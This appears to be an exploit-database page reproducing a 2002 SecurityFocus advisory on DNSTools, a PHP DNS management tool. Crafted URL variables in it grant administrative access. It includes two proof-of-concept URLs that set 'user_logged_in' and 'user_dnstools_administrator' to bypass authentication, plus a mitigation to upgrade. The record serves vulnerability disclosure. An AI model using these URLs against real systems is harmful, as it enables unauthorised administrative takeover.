header-logo
Suggest Exploit
vendor:
DNSTools
by:
SecurityFocus
7.5
CVSS
HIGH
Remote Administrative Access Vulnerability
200
CWE
Product Name: DNSTools
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux and Solaris
2002

DNSTools Remote Administrative Access Vulnerability

A vulnerability has been reported in some versions of DNSTools which allows any remote attacker to gain administrative access. An artificially constructed URL may define variables used to track user authentication and administrative access.

Mitigation:

Upgrade to the latest version of DNSTools
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/4617/info

DNSTools is a web based managment tool for DNS information. It is implemented in PHP, and available for Linux and Solaris.

A vulnerability has been reported in some versions of DNSTools which allows any remote attacker to gain administrative access. An artificially constructed URL may define variables used to track user authentication and administrative access. 

http://www.example.com/dnstools.php?section=hosts&user_logged_in=true
http://www.example.com/dnstools.php?section=security&user_logged_in=true&user_dnstools_administrator=YES

Navigation

Suggest Exploit

Services By CQR